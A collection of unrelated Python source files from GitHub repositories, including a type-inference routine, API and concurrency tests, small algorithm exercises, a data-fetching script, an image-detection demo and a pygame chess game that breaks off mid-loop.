is_slice = subs.slice.__class__ is ast.Slice
assert is_index or is_slice
# Store the attributes of the slice.
if is_index:
i = subs.slice.value
else: # is_slice
l = subs.slice.lower
u = subs.slice.upper
s = subs.slice.step
if col_t is None:
# If we can't assign a type to the collection, then we can't assign a
# type to its subscript.
return None
# String subscripting
elif col_t == str_t or col_t == unicode_t:
if is_index and infer_expr(i, env) == int_t:
# (sidx) assignment rule.
return col_t
elif is_slice and valid_int_slice(l, u, s, env):
# (sslc) assignment rule.
return col_t
else:
# No assignment rule found.
return None
# List subscripting
elif col_t.is_list():
if is_index and check.check_expr(i, int_t, env):
# (lidx) assignment rule.
return col_t.elt
elif is_slice and valid_int_slice(l, u, s, env):
# (lslc) assignment rule.
return col_t
else:
# No assignment rule found.
return None
# Tuple subscripting
elif col_t.is_tuple():
col_ts = col_t.elts
n = len(col_ts)
if is_index and node_is_int(i) and -n <= i.n < n:
# (tidx) assignment rule.
return col_ts[i.n]
elif is_slice:
rng = slice_range(l, u, s, len(col_ts))
if rng is not None:
# (tslc) assignment rule.
return PType.tuple([col_ts[i] for i in rng])
else:
# No assignment rule found.
return None
else:
# No assignment rule found.
return None
else:
# No assignment rule found.
return None
|
jruberg/Pyty
|
src/infer.py
|
infer.py
|
py
| 7,283 |
python
|
en
|
code
| 5 |
github-code
|
6
|
18659256455
|
import asyncpg
from app.main import create_app
from app.settings import Settings
from tests.test_currencies import test_currencies_success
settings = Settings()
async def test_rate_success(aiohttp_client, loop):
currencies = await test_currencies_success(aiohttp_client, loop)
currency = currencies['results']['currencies'][0]['id']
client = await aiohttp_client(create_app)
conn = await asyncpg.connect(settings.dsn)
try:
resp = await client.get(f'/rate/{currency}/')
assert resp.status == 200
result = await resp.json()
assert 'current_rate' in result
assert 'avg_volume' in result
resp = await client.get(f'/rate/?id={currency}')
assert resp.status == 200
result = await resp.json()
assert 'current_rate' in result
assert 'avg_volume' in result
finally:
await conn.close()
async def test_rate_not_found(aiohttp_client, loop):
curency_name = 'BCH'
client = await aiohttp_client(create_app)
conn = await asyncpg.connect(settings.dsn)
try:
currency = await conn.fetchval('select id from currency where name=$1', curency_name)
await conn.execute('delete from currency where name=$1', curency_name)
resp = await client.get(f'/rate/{currency}/')
assert resp.status == 404
result = await resp.json()
assert 'error' in result
assert 'detail' in result
assert 'not found transaction' == result['detail']
finally:
await conn.close()
async def test_rate_error(aiohttp_client, loop):
curency_name = 'BCH'
client = await aiohttp_client(create_app)
resp = await client.get(f'/rate/{curency_name}/')
assert resp.status == 400
|
ridhid/test_aio
|
tests/test_rate.py
|
test_rate.py
|
py
| 1,745 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39180591311
|
# function programe 1
def funadd(e,f):
a=10
b=10
print("e:",e,"f:",f)
print(a+b)
return a+b,e+f
def funsub():
a=20
b=10
print(a-b)
c,d=funadd(4,8)
ff,dd=funadd(14,18)
print("c value:",c)
print("d value:",d)
funsub()
|
sameerCoder/pycc_codes
|
function_basic1_jan2020.py
|
function_basic1_jan2020.py
|
py
| 272 |
python
|
en
|
code
| 2 |
github-code
|
6
|
426288510
|
entered_string = input('Please enter the string: ')
def string_operations(text):
third_symbol = text[2]
print('Third symbol of this string: {}'.format(third_symbol))
penultimate = text[-2]
print('Penultimate character of this string: {}'.format(penultimate))
first_five = text[:5]
print('First five characters of this string: {}'.format(first_five))
without_last_two = text[:-2]
print('The entire string except the last two characters: {}'.format(without_last_two))
even_indices = text[::2]
print('All characters with even indices (assuming that indexing starts at 0,'
' so characters are output starting from the first one).: {}'.format(even_indices))
odd_indices = text[1::2]
print('All characters with odd indices, that is,'
' starting from the second character of the string.: {}'.format(odd_indices))
reverse_order = text[::-1]
print('All characters in reverse order.: {}'.format(reverse_order))
reverse_from_last_one = text[-1::-2]
print('All the characters of the string one by one in reverse order,'
' starting with the last one.: {}'.format(reverse_from_last_one))
length_of_the_string = len(text)
print('The length of this string.: {}'.format(length_of_the_string))
string_operations(entered_string)
|
YanaSharkan/Homework
|
lesson_4_hw_3/task_5_process_string.py
|
task_5_process_string.py
|
py
| 1,317 |
python
|
en
|
code
| 0 |
github-code
|
6
|
17510551183
|
'''
2 ways:
1. consider all substrings, and use memoization to not reconsider substrings
leetcode
^
abcd
a bcd ab cd abc d abcd .
/ | \
b cd bc d bcd .
n = s.length
helper(mid = 1)
function helper(mid)
if mid == n:
return True
#s = orig-s[mid:]
for idx in [mid ... n]
if s.substring(0..idx) and helper(idx)
return True
return False
2. iteratively get the answer of whether s[i] can be segmented until i = n - 1
tabulation
table[i] = substring[i]
abcde
00 = t
01 = t/f
02 = 01? and 2 = F
03 = 02F
0n
f[0] = true
for cvc = 1 .. n
for k = 0 .. cvc
f[cvc] = f[cvc] or ( s.substring(0, cvc) and f[k])
return f[n]
'''
class Solution:
def wordBreak(self, s: str, wordDict: List[str]) -> bool:
n = len(s)
f = [False] * (n + 1)
words = set(wordDict)
f[0] = True
for cvc in range(1, n + 1): # 3 [_ _ _]
for k in range(cvc+1): # 0 .. 3 --> 0, 1
f[cvc] = f[cvc] or (s[k:cvc] in words and f[k])
return f[n]
|
soji-omiwade/cs
|
dsa/before_rubrik/wordbreak_with_tabulation.py
|
wordbreak_with_tabulation.py
|
py
| 1,195 |
python
|
en
|
code
| 0 |
github-code
|
6
|
24113556949
|
from sys import stderr
from tourney import *
ENGINE = './erastus -i 10000 -w 4'
SCORE_THRESHOLD = .2
START = '0000000000000000000000000xxxxxxxx1'
def puzzle_search():
engine = Engine(ENGINE)
state = START
while 1:
action, log = engine.run(state)
stderr.write('.')
stderr.flush()
top_score = None
for line in log.split('\n'):
if not line.startswith('alt'):
continue
_, score, _ = line.split()
score = float(score)
if top_score == None:
top_score = score
if top_score != 1:
break
else:
diff = top_score - score
if diff >= SCORE_THRESHOLD:
print(f'https://erastus.schneiderbox.net/#{state}\t({diff})')
break
state = move_state(state, action)
if action_count(state) == 0:
stderr.write('\n')
state = START
if __name__ == '__main__':
puzzle_search()
|
richardjs/erastus
|
src/puzzlesearch.py
|
puzzlesearch.py
|
py
| 1,059 |
python
|
en
|
code
| 1 |
github-code
|
6
|
23404494402
|
"""Test the concurrency module."""
from typing import Any
import pytest
from rtasr.concurrency import ConcurrencyHandler, ConcurrencyToken
class TestConcurrencyToken:
"""Test the ConcurrencyToken class."""
@pytest.mark.parametrize("value", [None, "string", True, False, [], {}])
def test_concurrency_token_invalid(self, value: Any) -> None:
"""Test the concurrency token with invalid values."""
with pytest.raises(TypeError):
ConcurrencyToken(value)
@pytest.mark.parametrize("value", [0, 1, 2, 1.0, 2.0])
def test_concurrency_token_valid(self, value: int) -> None:
"""Test the concurrency token."""
token = ConcurrencyToken(value=value)
assert token.value == value
class TestConcurrencyHandler:
"""Test the ConcurrencyHandler class."""
@pytest.mark.asyncio
async def test_concurrency_handler_with_limit(self) -> None:
"""Test the concurrency handler with a limit."""
limit = 5
concurrency_handler = ConcurrencyHandler(limit)
assert hasattr(concurrency_handler, "limit")
assert hasattr(concurrency_handler, "queue")
assert concurrency_handler.limit == limit
assert concurrency_handler.queue.maxsize == limit
tokens = []
for _ in range(limit):
token = await concurrency_handler.get()
assert isinstance(token, ConcurrencyToken)
tokens.append(token)
# Queue should be empty now
assert concurrency_handler.queue.empty()
for token in tokens:
concurrency_handler.put(token)
# Queue should be refilled
for _ in range(limit):
token = await concurrency_handler.get()
assert isinstance(token, ConcurrencyToken)
@pytest.mark.asyncio
async def test_concurrency_handler_without_limit(self) -> None:
"""Test the concurrency handler without a limit."""
concurrency_handler = ConcurrencyHandler(limit=None)
token = await concurrency_handler.get()
assert token is None
|
Wordcab/rtasr
|
tests/test_concurrency.py
|
test_concurrency.py
|
py
| 2,077 |
python
|
en
|
code
| 5 |
github-code
|
6
|
14629235583
|
import numpy as np
import time
import os
import sys
from scipy.stats import poisson, binom
from scipy.special import erf as erf
from admin import make_glob_array
import multiprocessing
# from Sim_show import Sim_fit
import matplotlib.pyplot as plt
from mpl_toolkits import mplot3d
import matplotlib.colors as mcolors
from make_3D import make_3D
pmts=np.array([0,1,4,6,7,3,10,13,15,17,18,5,11,12,14])
path='/home/gerak/Desktop/DireXeno/011220/'
data=np.load(path+'h.npz')
Angs=data['Angs']
Angs10=data['Angs10']
Angsbins=data['Angsbins']
H=data['H']
G=data['G']
Spectrum=data['spectrum']
Sbins=data['Sbins']
Spectra=np.transpose(data['spectra'], (2,0,1))
sbins=data['sbins']
FSbins=data['FSbins']
FullSpectrum=data['Fullspectrum']
w=data['W']
Wbins=data['Wbins']
Wbands=data['Wbands']
Sbands=data['Sbands']
W20_40=data['W20_40']
W20_40bins=data['W20_40bins']
data=np.loadtxt(path+'NRel.txt')
NDep=[]
NSpec=[]
for i in range(len(data)):
NDep.append(data[i][0])
NSpec.append(data[i][1])
NSpec=NSpec/np.sum(NSpec)
N=10
data=np.load('Q.npz')
ls=data['ls']
Sspectrum=data['Ravel_Spectrum'].reshape((N, 1, np.shape(Spectrum)[0]))[:,0]
Sspectra=data['Ravel_Spectra'].reshape((N, 1, np.shape(Spectra)[0], np.shape(Spectra)[1], np.shape(Spectra)[2]))[:,0]
SG=data['Ravel_G'].reshape((N, 1, np.shape(G)[0], np.shape(G)[1], np.shape(G)[2]))[:,0]
SH=data['Ravel_H'].reshape((N, 1, np.shape(H)[0], np.shape(H)[1], np.shape(H)[2], np.shape(H)[3]))[:,0]
SAngs=data['Ravel_Angs'].reshape((N, 1, np.shape(Angs)[0], np.shape(Angs)[1]))[:,0]
SFullspectrum=data['Ravel_Fullspectrum'].reshape((N, 1, np.shape(FullSpectrum)[1]))[:,0]
SW=data['Ravel_W'].reshape((N, 1, np.shape(w)[0]))[:,0]
keVbins=data['keVbins']
PEbins=data['PEbins']
keVPE=data['Ravel_KeVPE'].reshape((N, len(keVbins)-1, len(PEbins)-1))
y=np.arange(0, 600)
y1=data['adn']*y+data['bdn']
y2=data['aup']*y+data['bup']
plt.figure()
plt.title('Energy spectrum')
plt.step(NDep, NSpec, where='mid')
# plt.yscale('log')
plt.figure(figsize=(20,10))
X, Y= np.meshgrid(0.5*(keVbins[1:]+keVbins[:-1]), 0.5*(PEbins[1:]+PEbins[:-1]))
plt.pcolor(Y, X, np.mean(keVPE, axis=0), norm=mcolors.PowerNorm(0.3))
plt.plot(y, y1, 'k--', label='{}x+{}'.format(np.round(data['adn'],decimals=2), np.round(data['bdn'],decimals=2)), linewidth=5)
plt.plot(y, y2, 'k--', label='{}x+{}'.format(np.round(data['aup'],decimals=2), np.round(data['bup'],decimals=2)), linewidth=5)
plt.xlabel('PEs', fontsize=25)
plt.ylabel('keV', fontsize=25)
plt.tick_params(axis='both', which='major', labelsize=20)
cbar=plt.colorbar()
cbar.ax.tick_params(labelsize=25)
plt.legend(fontsize=35, loc='upper right')
plt.xlim(0, np.amax(PEbins))
plt.ylim(0, np.amax(keVbins))
plt.figure()
plt.title('W')
plt.bar(0.5*(Wbins[1:]+Wbins[:-1]), w, width=Wbins[1:]-Wbins[:-1], color='r', alpha=0.5)
plt.errorbar(0.5*(Wbins[1:]+Wbins[:-1]), np.mean(SW, axis=0), np.std(SW, axis=0), fmt='.')
for i in range(len(Wbands)):
plt.axvline(Wbands[i], 0, 1)
plt.yscale('log')
#
plt.figure()
plt.title('Full Spectrum')
plt.step(0.5*(FSbins[1:]+FSbins[:-1]), np.sum(FullSpectrum, axis=0), where='mid')
for i in range(len(Wbands)-1):
plt.bar(0.5*(FSbins[1:]+FSbins[:-1]), FullSpectrum[i], width=FSbins[1:]-FSbins[:-1], label='spectrum', alpha=0.5)
plt.errorbar(0.5*(FSbins[1:]+FSbins[:-1]), np.mean(SFullspectrum, axis=0), np.std(SFullspectrum, axis=0), fmt='.', label='A')
plt.yscale('log')
plt.legend()
plt.figure()
plt.title('Global Spectrum')
plt.bar(0.5*(Sbins[1:]+Sbins[:-1]), Spectrum, width=Sbins[1:]-Sbins[:-1], label='spectrum', color='r', alpha=0.5)
plt.errorbar(0.5*(Sbins[1:]+Sbins[:-1]), np.mean(Sspectrum, axis=0), np.std(Sspectrum, axis=0), fmt='.', label='A')
plt.legend()
plt.yscale('log')
t=np.arange(100)
fig, ax=plt.subplots(2,3)
for k in range(len(Sbands)-1):
#plt.title('The temporal structure in different energy ranges (NRs) {}-{}'.format(Sbands[k], Sbands[k+1]), fontsize=35)
data=np.ravel(G[k])
model=np.ravel(np.mean(SG[:,k], axis=0))
N=np.sum(np.sum(G[k].T*np.arange(np.shape(G)[1]), axis=1)/np.sum(G[k], axis=0))
np.ravel(ax)[k].step(t, (np.sum(G[k].T*np.arange(np.shape(G)[1]), axis=1)/np.sum(G[k], axis=0))/N, where='mid', label='PEs: {}-{}'.format(Sbands[k], Sbands[k+1]), linewidth=3)
np.ravel(ax)[k].errorbar(t, np.mean(np.sum(np.transpose(SG[:,k], (0,2,1))*np.arange(np.shape(G)[1]), axis=-1)/np.sum(SG[:,k], axis=1), axis=0)/N,
np.std(np.sum(np.transpose(SG[:,k], (0,2,1))*np.arange(np.shape(G)[1]), axis=-1)/np.sum(SG[:,k], axis=1), axis=0)/N, fmt='.', label='{}'.format(-np.sum(data*np.log((model+1e-10)/(data+1e-10))+data-model)))
np.ravel(ax)[k].legend(fontsize=10)
np.ravel(ax)[k].set_yscale('log')
# plt.xlabel('Time [ns]', fontsize=35)
# plt.ylabel('The probability to resolve a PE /\naveage number of PEs at\n the energy range', fontsize=35)
# plt.ylabel('The average number of\nPEs resolved (normalized)', fontsize=35)
# plt.tick_params(axis='both', which='major', labelsize=20)
# plt.show()
# for k in range(len(Sbands)-1):
# fig, ax=plt.subplots(4,4)
# fig.suptitle('PMT spectra ({}-{})'.format(Sbands[k], Sbands[k+1]))
# for i in range(15):
# np.ravel(ax)[i].step(0.5*(sbins[1:]+sbins[:-1]), Spectra[k,:,i], where='mid', label='A')
# np.ravel(ax)[i].errorbar(0.5*(sbins[1:]+sbins[:-1]), np.mean(Sspectra[:,k,:,i], axis=0), np.std(Sspectra[:,k,:,i], axis=0), fmt='.', label='A')
# np.ravel(ax)[i].legend()
# np.ravel(ax)[i].set_yscale('log')
# for k in range(len(Sbands)-1):
for k in range(1):
fig, ax=plt.subplots(4,4)
fig.suptitle('PMT temporal ({}-{})'.format(Sbands[k], Sbands[k+1]))
for i in range(15):
np.ravel(ax)[i].step(t, np.sum(H[k, :,:,i].T*np.arange(np.shape(H)[1]), axis=1)/np.sum(H[k, :,:,i], axis=0), where='mid', label='PMT{}'.format(pmts[i]))
# np.ravel(ax)[i].errorbar(t, np.mean(np.sum(np.transpose(SH[k,:,:,:,i], (0,2,1))*np.arange(np.shape(H)[1]), axis=-1)/np.sum(SH[k,:,:,:,i], axis=1), axis=0),
# np.std(np.sum(np.transpose(SH[k,:,:,:,i], (0,2,1))*np.arange(np.shape(H)[1]), axis=-1)/np.sum(SH[k,:,:,:,i], axis=1), axis=0), fmt='.')
np.ravel(ax)[i].set_yscale('log')
np.ravel(ax)[i].legend()
plt.show()
|
gerakolt/DireXeno
|
fit/show.py
|
show.py
|
py
| 6,250 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22676158140
|
import cv2
import matplotlib.pyplot as plt
import numpy as np
import selectivesearch
from predictors import resnet152
from utils import selectors, nms
import xml.etree.ElementTree as ET
import random
boxes = {}
def getImgReady(img, show=False):
if img is None:
return None
if show:
plt.imshow(img)
plt.axis('off')
# convert into format (batch, RGB, width, height)
img = cv2.resize(img, (224, 224))
img = np.swapaxes(img, 0, 2)
img = np.swapaxes(img, 1, 2)
img = img[np.newaxis, :]
return img
def addBox(x, y, w, h, prob, label):
x1 = x
x2 = x + w
y1 = y
y2 = y + h
if not boxes.has_key(label):
boxes[label] = [[x1, y1, x2, y2, prob]]
else:
boxes[label].append([x1, y1, x2, y2, prob])
def drawGroundTruth(imgName, img):
xmlTree = ET.parse(annotationsDir + '{}.xml'.format(imgName.split('.')[0])) # reads corresponding XML file
for object in xmlTree.findall('object'):
name = object.find('name').text
name = nameDict[name]
bndbox = object.find('bndbox')
xmin = int(float(bndbox.find('xmin').text)) #reads coordinates
ymin = int(float(bndbox.find('ymin').text))
xmax = int(float(bndbox.find('xmax').text))
ymax = int(float(bndbox.find('ymax').text))
rect = plt.Rectangle((xmin, ymin), xmax - xmin, ymax - ymin,
fill=False, edgecolor=(0, 1, 0), linewidth=3.5)
plt.gca().add_patch(rect)
plt.gca().text(xmin, ymin - 2, 'Ground Truth:{:s}'.format(name),
bbox=dict(facecolor=(0, 1, 0), alpha=0.5), fontsize=12, color='white')
def getNameDict(filename):
dic = {}
with open(filename, 'r') as f:
lines = f.readlines()
for line in lines:
line = line.strip('\n')
key = line.split(' ')[0]
val = line.split(' ')[1]
dic[key] = val
return dic
annotationsDir = '../Data/ImageNet/ILSVRC2012/val-Annotations/'
imgsDir = '../Data/ImageNet/ILSVRC2012/img_val/'
nameDict = getNameDict('../synset.txt')
imgName = selectors.selectImg(imgsDir)
imgPath = imgsDir + imgName
img = cv2.cvtColor(cv2.imread(imgPath), cv2.COLOR_BGR2RGB)
plt.figure(imgName.split('.')[0])
plt.imshow(img)
plt.axis('off')
img_label, regions = selectivesearch.selective_search(img, scale = 500, sigma = 0.9, min_size = 500)
for i, region in enumerate(regions): #rect:x y w h
x = region['rect'][0]
y = region['rect'][1]
w = region['rect'][2]
h = region['rect'][3]
croppedImg = img[y:y + h,x:x + w]
croppedImg = getImgReady(croppedImg)
prob, label = resnet152.predict(croppedImg)
if prob < 0.2: #ignore low probability boxes
continue
addBox(x, y, w, h, prob, label)
for label in boxes:
color = (random.random(), random.random(), random.random())
indexes = nms.nms(np.array(boxes[label]), 0.3)
for i in indexes:
x1 = boxes[label][i][0]
y1 = boxes[label][i][1]
x2 = boxes[label][i][2]
y2 = boxes[label][i][3]
prob = boxes[label][i][4]
rect = plt.Rectangle((x1, y1), x2 - x1, y2 - y1,
fill=False, edgecolor=color, linewidth=3.5)
plt.gca().add_patch(rect)
plt.gca().text(x1, y1 - 2, '{:s} {:.3f}'.format(label, prob),
bbox=dict(facecolor=color, alpha=0.5), fontsize=12, color='white')
drawGroundTruth(imgName, img)
plt.show()
|
juvu/ImageSearch
|
test/testPredictorInterface.py
|
testPredictorInterface.py
|
py
| 3,482 |
python
|
en
|
code
| null |
github-code
|
6
|
15393426988
|
# -*- coding:utf-8 -*-
class Solution:
def GetLeastNumbers_Solution(self, tinput, k):
# write code here
if len(tinput) < k or k <= 0: #他妈的还有这个条件 k不能为0!!!
return []
length = len(tinput)
start = 0
end = length - 1
index = self.partition(tinput, length, start, end)
while index != (k-1):
if index > k-1:#前index位比K多,从start到K重新排序
end = index - 1
index = self.partition(tinput, length, start, end)
else:#前start已经排序,但是start到k还没排好
start = index + 1
index = self.partition(tinput, length, start, end)
return sorted(tinput[:k])
def partition(self, data, length, start, end):
temp = data[start]
while start < end:
while start < end and data[end] >= temp:
end -= 1
data[start] = data[end]
while start < end and data[start] <= temp:
start += 1
data[end] = data[start] #交换后面那个比temp大的到end
data[start] = temp
return start
|
shakesVan/Playground
|
Nowcoder/40.py
|
40.py
|
py
| 1,206 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31533523826
|
import math
vineyard_sq_m = int(input())
grapes_kg_per_sq_m = float(input())
wine_litres_needed = int(input())
number_workers = int(input())
difference = 0
litres_wine = 0
litres_per_worker = 0
total_grapes = vineyard_sq_m * grapes_kg_per_sq_m
percent_for_wine = 0.4
grapes_for_wine = total_grapes * 0.4
litres_wine = grapes_for_wine / 2.5
difference = abs(litres_wine - wine_litres_needed)
if litres_wine < wine_litres_needed:
print(f"It will be a tough winter! More {math.floor(difference)} liters wine needed.")
elif litres_wine >= wine_litres_needed:
litres_per_worker = difference / number_workers
print(f"Good harvest this year! Total wine: {math.floor(litres_wine)} liters.")
print(f"{math.ceil(difference)} liters left -> {math.ceil(litres_per_worker)} liters per person.")
|
iliyan-pigeon/Soft-uni-Courses
|
programming_basics_python/conditional_statements_more_exercises/harvest.py
|
harvest.py
|
py
| 801 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8190287555
|
#!/usr/bin/env python3
# Get sequences from NCBI.
# To be called from Snakefile.
# Usage: python windows.py <infile> <outfile> <email> <window_size>
import os
import sys
from Bio import Entrez
from Bio import SeqIO
import pandas as pd
def main():
snpfile = sys.argv[1]
outfile = sys.argv[2]
email = sys.argv[3]
window_size = sys.argv[4]
interest = pd.read_csv(
snpfile,
header=0,
dtype={"chrom": str, "center": np.int64},
)
interest.columns = interest.columns.str.lower().str.replace(" ", "_")
interest[["chrom", "center"]] = (
interest.iloc[:, 0]
.str.replace("_[A-Z]{3}?", "")
.str.replace(" ", "")
.str.split("_", expand=True)
)
interest.assign(
start=lambda center: center.to_numeric() - window_size,
end=lambda center: center.to_numeric() + window_size
)
interest.index.rename("Index", inplace=True)
summary = pd.read_csv("Data/dmelSummary.csv")
summary.index.rename("Index", inplace=True)
summary.columns = summary.columns.str.lower().str.replace(" ", "_")
seqs = []
Entrez.email = email
for index, row in interest.iterrows():
with Entrez.efetch(
db="nucleotide",
id=summary.loc[summary["name"] == row["chrom"], "refseq"].iat[0],
rettype="fasta",
strand=1,
seq_start=row["start"],
seq_stop=row["end"],
) as handle:
seqs.append(SeqIO.read(handle, "fasta"))
SeqIO.write(seqs, outfile, "fasta")
if __name__ == "__main__":
main()
|
mpjuers/SexualSelectionSubstitutions
|
Scripts/GetData/windows.py
|
windows.py
|
py
| 1,594 |
python
|
en
|
code
| 0 |
github-code
|
6
|
25068821679
|
import pygame
from math import *
import time
pygame.init()
pygame.display.set_caption("sprite sheet") # sets the window title
screen = pygame.display.set_mode((1000, 800)) # creates game screen
screen.fill((0,0,0))
clock = pygame.time.Clock() #set up clock
#Variables and stuff (Start)-------------------------------------------------------------------
red_pawn = pygame.image.load('RedPawn.png') #load your spritesheet
white_pawn = pygame.image.load('WhitePawn.png') #load your spritesheet
background = pygame.image.load('Chess board.png')#loads background
white_rook = pygame.image.load('WhiteRook.png')
red_rook = pygame.image.load('RedRook.png')
white_queen = pygame.image.load('WhiteQueen.png')
red_queen = pygame.image.load('RedQueen.png')
white_king = pygame.image.load('WhiteKing.png')
red_king = pygame.image.load('RedKing.png')
white_bishop = pygame.image.load('WhiteBishop.png')
red_bishop = pygame.image.load('RedBishop.png')
red_knight = pygame.image.load('RedKnight.png')
white_knight = pygame.image.load('WhiteKnight.png')
White=(255,255,255)
PIECEWIDTH = 100
checkmate = False #variable to run our game loop
whiteturn = True
hasPicked = False
clicked = False
TurnNum=0
ticks = 1
tickss = 1
t = 600
t2 = 600
pygame.display.set_caption('Show Text')
font = pygame.font.Font('freesansbold.ttf', 32)
#Variables and stuff (End)--------------------------------------------------------------------
#text to screen setup
#text input------------------------------------------
n1 = input('Enter your name player 1:')
n2 = input('Enter your name player 2')
#End of text input----------------------------------
#Pieces start-----------------------------------------------
class pieces:
def __init__(self,xpos,ypos,type):
self.xpos = xpos
self.ypos = ypos
self.lifted = False
self.type = type
self.alive = True
self.row=0
self.column=0
def updatePos(self):
self.row = int(self.xpos/100)
self.column = int(self.ypos/100)
print("my row and column is ", self.row, self.column)
self.xpos = self.row*100
self.ypos = self.column*100
def isClicked(self,x,y):
global hasPicked
global TurnNum
print("checking distance")
if self.alive == True:
if hasPicked == False and self.lifted == False:
if (sqrt(((self.xpos+50)-x)**2 + ((self.ypos+50)-y)**2)) <= 50:#check if the distance b/t (x, y) and (self.xpos, self.ypos) is LESS than 50
self.lifted = True #if true, set lifted to true
hasPicked = True
TurnNum+=1
print("lifted!")
else:
print("no collision")
def move(self, x, y):
if self.lifted == True:#if islifed is true, set self.xpos to x, and self.ypos to y
self.xpos = x-50
self.ypos = y-50
def draw(self):
if self.alive == True:
#pawns
if self.type == "WhitePawn":
screen.blit(white_pawn, (self.xpos, self.ypos), (0, 0, 100, 100))
if self.type == "RedPawn":
screen.blit(red_pawn, (self.xpos, self.ypos), (0, 0, 100, 100))
#knights
if self.type == "WhiteKnight":
screen.blit(white_knight, (self.xpos, self.ypos), (0, 0, 100, 100))
if self.type == "RedKnight":
screen.blit(red_knight, (self.xpos, self.ypos), (0, 0, 100, 100))
#bishop
if self.type == "WhiteBishop":
screen.blit(white_bishop, (self.xpos, self.ypos), (0, 0, 100, 100))
if self.type == "RedBishop":
screen.blit(red_bishop, (self.xpos, self.ypos), (0, 0, 100, 100))
#rook
if self.type == "WhiteRook":
screen.blit(white_rook, (self.xpos, self.ypos), (0, 0, 100, 100))
if self.type == "RedRook":
screen.blit(red_rook, (self.xpos, self.ypos), (0, 0, 100, 100))
#king
if self.type == "WhiteKing":
screen.blit(white_king, (self.xpos, self.ypos), (0, 0, 100, 100))
if self.type == "RedKing":
screen.blit(red_king, (self.xpos, self.ypos), (0, 0, 100, 100))
#queen
if self.type == "WhiteQueen":
screen.blit(white_queen, (self.xpos, self.ypos), (0, 0, 100, 100))
if self.type == "RedQueen":
screen.blit(red_queen, (self.xpos, self.ypos), (0, 0, 100, 100))
#Pieces End-----------------------------------------------------------
#python list (like a vector)
whitelist = []
redlist = []
#White Pawns
WhitePawn1 = pieces(0, 100, "WhitePawn")
whitelist.append(WhitePawn1)
WhitePawn2 = pieces(100, 100, "WhitePawn")
whitelist.append(WhitePawn2)
WhitePawn3 = pieces(200, 100, "WhitePawn")
whitelist.append(WhitePawn3)
WhitePawn4 = pieces(300, 100, "WhitePawn")
whitelist.append(WhitePawn4)
WhitePawn5 = pieces(400, 100, "WhitePawn")
whitelist.append(WhitePawn5)
WhitePawn6 = pieces(500, 100, "WhitePawn")
whitelist.append(WhitePawn6)
WhitePawn7 = pieces(600, 100, "WhitePawn")
whitelist.append(WhitePawn7)
WhitePawn8 = pieces(700, 100, "WhitePawn")
whitelist.append(WhitePawn8)
#Red Pawns
RedPawn1 = pieces(0, 600, "RedPawn")
redlist.append(RedPawn1)
RedPawn2 = pieces(100, 600, "RedPawn")
redlist.append(RedPawn2)
RedPawn3 = pieces(200, 600, "RedPawn")
redlist.append(RedPawn3)
RedPawn4 = pieces(300, 600, "RedPawn")
redlist.append(RedPawn4)
RedPawn5 = pieces(400, 600, "RedPawn")
redlist.append(RedPawn5)
RedPawn6 = pieces(500, 600, "RedPawn")
redlist.append(RedPawn6)
RedPawn7 = pieces(600, 600, "RedPawn")
redlist.append(RedPawn7)
RedPawn8 = pieces(700, 600, "RedPawn")
redlist.append(RedPawn8)
#White Rooks
WhiteRook1 = pieces(0, 0, "WhiteRook")
whitelist.append(WhiteRook1)
WhiteRook2 = pieces(700, 0, "WhiteRook")
whitelist.append(WhiteRook2)
#Red Rooks
RedRook1 = pieces(0, 700, "RedRook")
redlist.append(RedRook1)
RedRook2 = pieces(700, 700, "RedRook")
redlist.append(RedRook2)
#White Knights
WhiteKnight1 = pieces(100, 0, "WhiteKnight")
whitelist.append(WhiteKnight1)
WhiteKnight2 = pieces(600, 0, "WhiteKnight")
whitelist.append(WhiteKnight2)
#Red Knights
RedKnight1 = pieces(100, 700, "RedKnight")
redlist.append(RedKnight1)
RedKnight2 = pieces(600, 700, "RedKnight")
redlist.append(RedKnight2)
#White Bishops
WhiteBishop1 = pieces(200, 0, "WhiteBishop")
whitelist.append(WhiteBishop1)
WhiteBishop2 = pieces(500, 0, "WhiteBishop")
whitelist.append(WhiteBishop2)
#Red Bishop
RedBishop1 = pieces(200, 700, "RedBishop")
redlist.append(RedBishop1)
RedBishop2 = pieces(500, 700, "RedBishop")
redlist.append(RedBishop2)
#White and Red King
WhiteKing = pieces(300, 0, "WhiteKing")
whitelist.append(WhiteKing)
RedKing = pieces(300, 700, "RedKing")
redlist.append(RedKing)
#White and Red Queen
WhiteQueen = pieces(400, 0, "WhiteQueen")
whitelist.append(WhiteQueen)
RedQueen = pieces(400, 700, "RedQueen")
redlist.append(RedQueen)
#MAP:
map = [[3, 4, 5, 6, 7, 5, 4, 3],
[2, 2, 2, 2, 2, 2, 2, 2],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1],
[8, 9, 10, 11, 12, 10, 9, 8]]
while not checkmate:
clock.tick(60)
#print("clicked is ", clicked)
for event in pygame.event.get():
if event.type == pygame.QUIT:
checkmate = True
if event.type == pygame.MOUSEBUTTONDOWN:
if pygame.MOUSEBUTTONDOWN:
print("click")
if clicked == False:
clicked = True
elif clicked == True:
clicked = False
if event.type == pygame.MOUSEBUTTONUP:
print("unclick")
clicked = False
if event.type == pygame.MOUSEMOTION: #check if mouse moved
mousePos = event.pos #refreshes mouse position
# print("mouse position: (",mousePos[0]," , ",mousePos[1], ")")
#COLLISION
#White updatepos
for i in range(len(whitelist)):
whitelist[i].updatePos()
#red updatepos
for i in range(len(redlist)):
redlist[i].updatePos()
if clicked ==True:
if whiteturn is True:# if whiteturn is true white pieces go
#white clicked function
for i in range(len(whitelist)):
whitelist[i].isClicked(mousePos[0],mousePos[1])
if whiteturn is False: # if whiteturn is false red goes
#red clicked function
for i in range(len(redlist)):
redlist[i].isClicked(mousePos[0],mousePos[1])
if clicked == False:
hasPicked = False
#white pieces lifted set down
for i in range(len(whitelist)):
whitelist[i].lifted = False
#red piece lifted set down
for i in range(len(redlist)):
redlist[i].lifted = False
#White pieces move
for i in range(len(whitelist)):
whitelist[i].move(mousePos[0],mousePos[1])
#Red pieces move
for i in range(len(redlist)):
redlist[i].move(mousePos[0],mousePos[1])
#print to screen
if whiteturn == True:
ticks +=1
if ticks%60==0: #add a ticker variable here, add 1 to it, when it hits 60, decrement t and reset time
t-=1
if t == 0:
gameover = True
if whiteturn == False:
